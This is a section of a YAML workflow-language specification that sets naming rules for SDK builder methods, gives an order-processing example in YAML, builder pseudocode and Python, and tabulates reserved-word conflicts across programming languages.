| R-SDK-4 | Non-conflicting directives SHOULD use the `<yamlKey>Step()` suffix for consistency, and MAY additionally provide unsuffixed aliases (e.g., `group()` alongside `groupStep()`) | Uniform suffix prevents SDK authors from needing to track which names conflict where |
| R-SDK-5 | Conflicting sub-keys MUST use `<yamlKey><Suffix>()` where the suffix describes the key's semantic role | The original key name remains the prefix for instant recognition; the suffix disambiguates from reserved words |
| R-SDK-6 | Builder output MUST serialize to spec-compliant YAML. Builders SHOULD support shorthand forms but MUST produce valid full-form YAML at minimum | The builder is purely a construction convenience — the canonical form is always YAML |

**Directive builder methods (conflicting — MUST use suffix):**

| YAML directive | Builder method |
|---|---|
| `if` | `ifStep()` |
| `while` | `whileStep()` |
| `switch` | `switchStep()` |
| `try` | `tryStep()` |
| `return` | `returnStep()` |
| `break` | `breakStep()` |
| `continue` | `continueStep()` |
| `throw` | `throwStep()` |
| `yield` | `yieldStep()` |
| `assert` | `assertStep()` |
| `lock` | `lockStep()` |

**Directive builder methods (non-conflicting — SHOULD use suffix, MAY provide alias):**

| YAML directive | Builder method | Alias permitted |
|---|---|---|
| `group` | `groupStep()` | `group()` |
| `forEach` | `forEachStep()` | `forEach()` |
| `repeat` | `repeatStep()` | `repeat()` |
| `set` | `setStep()` | `set()` |
| `log` | `logStep()` | `log()` |
| `logWarn` | `logWarnStep()` | `logWarn()` |
| `logError` | `logErrorStep()` | `logError()` |
| `emit` | `emitStep()` | `emit()` |
| `waitFor` | `waitForStep()` | `waitFor()` |
| `waitUntil` | `waitUntilStep()` | `waitUntil()` |
| `wait` | `waitStep()` | `wait()` |
| `cancel` | `cancelStep()` | `cancel()` |
| `parallel` | `parallelStep()` | `parallel()` |
| `race` | `raceStep()` | `race()` |

**Action builder methods (none conflict — SHOULD use suffix for uniformity):**

| YAML action | Builder method | Alias permitted |
|---|---|---|
| `call` | `callStep()` | `call()` |
| `run` | `runStep()` | `run()` |
| `exec` | `execStep()` | `exec()` |
| `request` | `requestStep()` | `request()` |
| `mail` | `mailStep()` | `mail()` |
| `storage` | `storageStep()` | `storage()` |
| `ssh` | `sshStep()` | `ssh()` |

**Conflicting sub-key methods:**

| YAML key | Used in | Builder method | Suffix rationale |
|---|---|---|---|
| `do` | group, forEach, while, repeat, try, lock + flow root | `doBody()` | Body = step list container |
| `catch` | try, actions, flow root | `catchErrors()` | Errors = what catch handles |
| `finally` | try, flow root | `finallyBlock()` | Block = structural block |
| `else` | if | `elseBlock()` | Block = structural block |
| `default` | switch | `defaultCase()` | Case = switch case terminology |
| `match` | switch | `matchCases()` | Cases = collection of match cases |
| `async` | all actions | `asyncMode()` | Mode = boolean configuration flag |
| `as` | forEach | `asVar()` | Var = names the loop variable |
| `from` | mail | `fromAddress()` | Address = mail sender address |

Non-conflicting sub-keys use their YAML names directly: `condition()`, `then()`, `elseIf()`, `items()`, `index()`, `until()`, `value()`, `timeout()`, `retry()`, `rateLimit()`, `circuitBreaker()`, `result()`, `params()`, `service()`, `operation()`, `flow()`, `handle()`, `cap()`, `command()`, `args()`, `url()`, `method()`, `headers()`, `body()`, `subject()`, `to()`, `message()`, `data()`, `event()`, `source()`, `capture()`, etc.

**Annotation methods:**

| YAML key | Builder method |
|---|---|
| `_id_` | `id()` |
| `_label_` | `label()` |
| `_notes_` | `notes()` |
| `_meta_` | `meta()` |

**CEL expression helpers:**

| Helper | Purpose | Example |
|---|---|---|
| `expression("expr")` | Wraps value with `=` prefix | `expression("x > 0")` → `"=x > 0"` |
| `template("text {{expr}}")` | Template interpolation (passthrough, for clarity) | `template("Hi {{name}}")` → `"Hi {{name}}"` |
| `duration("5s")` | Duration literal (passthrough, for clarity) | `duration("5s")` → `"5s"` |
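
The helpers in the table above are small enough to sketch in full. The Python version below is one possible reading of the table, not a reference implementation: `expression` adds the `=` prefix, while `template` and `duration` return their argument unchanged and exist only to make intent visible at the call site. The `x`, `inventory`, and `reserve` names in the usage lines are placeholders.

```python
def expression(expr: str) -> str:
    """Mark a string as CEL by adding the `=` prefix."""
    return "=" + expr


def template(text: str) -> str:
    """Passthrough: signals that `text` contains {{ }} interpolation."""
    return text


def duration(value: str) -> str:
    """Passthrough: signals that `value` is a duration literal."""
    return value


# Usage with map construction (section 8.17.1); values are plain strings.
guard = {"if": {
    "condition": expression("x > 0"),
    "then": [{"log": template("x is {{x}}")}],
}}
call = {"call": {
    "service": "inventory",
    "operation": "reserve",
    "timeout": duration("5s"),
}}
print(guard["if"]["condition"])  # =x > 0
```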

#### 8.17.3 Complete Example

**YAML:**
```yaml
- try:
    do:
    - forEach:
        items: =order.items
        as: item
        do:
        - call:
            service: inventory
            operation: reserve
            params:
              sku: =item.sku
              quantity: =item.quantity
            result:
              reservation_id: =RESULT.id
            async: true
    catch:
      InventoryError:
      - log: "Stock unavailable: {{ERROR.MESSAGE}}"
      default:
      - throw:
          error: OrderFailedError
          message: =ERROR.MESSAGE
    finally:
    - log: "Order processing complete"
```

**Universal builder (pseudocode — works identically across all target languages):**
```
tryStep(
  doBody(
    forEachStep(
      items(expression("order.items")),
      asVar("item"),
      doBody(
        callStep(
          service("inventory"),
          operation("reserve"),
          params(
            "sku", expression("item.sku"),
            "quantity", expression("item.quantity")
          ),
          result("reservation_id", expression("RESULT.id")),
          asyncMode(true)
        )
      )
    )
  ),
  catchErrors(
    "InventoryError", list(
      logStep("Stock unavailable: {{ERROR.MESSAGE}}")
    ),
    defaultCase(list(
      throwStep(
        error("OrderFailedError"),
        message(expression("ERROR.MESSAGE"))
      )
    ))
  ),
  finallyBlock(
    logStep("Order processing complete")
  )
)
```
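
As a concrete reading of the pseudocode, the following Python sketch implements just enough of the builder to reproduce the YAML example as a nested map. Everything here is an assumption made for illustration: the private factory functions, the choice to pass `(key, value)` pairs between helpers, and the use of Python list literals where the pseudocode writes `list(...)` (Python's built-in `list()` has different semantics). The camelCase names are kept to mirror the convention rather than Python style.

```python
import json


def expression(expr):
    """Wrap a CEL expression with the `=` prefix."""
    return "=" + expr


def _sub_key(key):
    """Factory for helpers that set one sub-key to a single value."""
    def helper(value):
        return (key, value)
    return helper


def _step_list(key):
    """Factory for helpers whose value is a list of steps."""
    def helper(*steps):
        return (key, list(steps))
    return helper


def _alternating(key):
    """Factory for helpers taking name, value, name, value, ... arguments."""
    def helper(*args):
        return (key, dict(zip(args[0::2], args[1::2])))
    return helper


def _step(directive):
    """Factory for step builders: gathers (key, value) pairs under the directive."""
    def helper(*pairs):
        return {directive: dict(pairs)}
    return helper


items, asVar, asyncMode = _sub_key("items"), _sub_key("as"), _sub_key("async")
service, operation = _sub_key("service"), _sub_key("operation")
error, message = _sub_key("error"), _sub_key("message")
doBody, finallyBlock = _step_list("do"), _step_list("finally")
params, result = _alternating("params"), _alternating("result")
tryStep, forEachStep = _step("try"), _step("forEach")
callStep, throwStep = _step("call"), _step("throw")


def logStep(text):
    return {"log": text}


def defaultCase(steps):
    return ("default", steps)


def catchErrors(*args):
    """Accept error-name/handler pairs plus an optional defaultCase(...) pair."""
    handlers, i = {}, 0
    while i < len(args):
        if isinstance(args[i], tuple):      # produced by defaultCase(...)
            key, steps = args[i]
            i += 1
        else:                               # error name followed by its handler
            key, steps = args[i], args[i + 1]
            i += 2
        handlers[key] = steps
    return ("catch", handlers)


step = tryStep(
    doBody(forEachStep(
        items(expression("order.items")),
        asVar("item"),
        doBody(callStep(
            service("inventory"),
            operation("reserve"),
            params("sku", expression("item.sku"),
                   "quantity", expression("item.quantity")),
            result("reservation_id", expression("RESULT.id")),
            asyncMode(True),
        )),
    )),
    catchErrors(
        "InventoryError", [logStep("Stock unavailable: {{ERROR.MESSAGE}}")],
        defaultCase([throwStep(error("OrderFailedError"),
                               message(expression("ERROR.MESSAGE")))]),
    ),
    finallyBlock(logStep("Order processing complete")),
)
print(json.dumps(step, indent=2))
```

The resulting map has the same keys and values as the YAML above, so it can be serialized through the map-construction path without a separate intermediate representation.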

#### 8.17.4 Serialization Requirements

| ID | Rule | Rationale |
|---|---|---|
| R-SDK-7 | Builder objects MUST provide a `toYaml()` or equivalent serialization method that produces spec-compliant YAML | Builders are construction helpers — the canonical exchange format is always YAML |
| R-SDK-8 | Builders SHOULD support shorthand forms (string retry, capture list, single-step unwrapping, `params:` null-value, `catch:` map form, etc.) but MUST produce valid full-form YAML at minimum | Shorthands improve readability but full-form is always correct |
| R-SDK-9 | Builder APIs MUST NOT introduce constructor-only features that have no YAML equivalent — every builder-constructed flow must be expressible as hand-written YAML | Prevents SDK lock-in; YAML remains the authoritative format |

#### 8.17.5 Complete Conflict Inventory

For reference, the following tables document the YAML key / reserved-word conflicts for nine of the target languages (PHP is not tabulated). An `X` indicates the key is a reserved word or keyword in that language; `~` indicates a soft keyword (contextual, but best avoided).

**Directive names (those that conflict in at least one language):**

| Directive | Java | Python | JS/TS | C# | Go | Rust | Kotlin | Swift | Ruby |
|---|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|
| `if` | X | X | X | X | X | X | X | X | X |
| `while` | X | X | X | X | — | X | X | X | X |
| `switch` | X | — | X | X | X | — | — | X | — |
| `try` | X | X | X | X | — | X | X | X | — |
| `return` | X | X | X | X | X | X | X | X | X |
| `break` | X | X | X | X | X | X | X | X | X |
| `continue` | X | X | X | X | X | X | X | X | — |
| `throw` | X | — | X | X | — | — | X | X | X |
| `yield` | — | X | X | X | — | X | — | — | X |
| `assert` | X | X | — | — | — | — | — | — | — |
| `lock` | — | — | — | X | — | — | — | — | — |

**Sub-key names (those that conflict in at least one language):**

| Key | Used in | Java | Python | JS/TS | C# | Go | Rust | Kotlin | Swift | Ruby |
|---|---|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|
| `do` | group, forEach, while, repeat, try, lock + flow root | X | — | X | X | — | X | X | X | X |
| `catch` | try, actions, flow root | X | — | X | X | — | — | ~ | X | X |
| `finally` | try, flow root | X | X | X | X | — | — | ~ | — | — |
| `else` | if | X | X | X | X | X | X | X | X | X |
| `default` | switch | X | — | X | X | X | — | — | X | — |
| `match` | switch | — | ~ | — | — | — | X | — | — | — |
| `async` | all actions | — | X | X | X | — | X | — | — | — |
| `as` | forEach | — | X | — | X | — | X | X | X | — |
| `from` | mail | — | X | — | — | — | — | — | — | — |
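
An SDK author can re-derive one column of these tables from the language itself. The sketch below does so for Python using the standard `keyword` module. It assumes Python 3.9 or later (for `keyword.issoftkeyword`), and `match` is only reported as a soft keyword from Python 3.10 onward. A plain `-` stands in for the "no conflict" marker.

```python
import keyword

DIRECTIVES = ["if", "while", "switch", "try", "return", "break",
              "continue", "throw", "yield", "assert", "lock"]
SUB_KEYS = ["do", "catch", "finally", "else", "default",
            "match", "async", "as", "from"]


def classify(name: str) -> str:
    """Return 'X' for a hard keyword, '~' for a soft keyword, '-' otherwise."""
    if keyword.iskeyword(name):
        return "X"
    if keyword.issoftkeyword(name):
        return "~"
    return "-"


for name in DIRECTIVES + SUB_KEYS:
    print(f"{name:10} {classify(name)}")
```

The same approach applies to any language that exposes its keyword list programmatically; for the others, the language reference remains the authority.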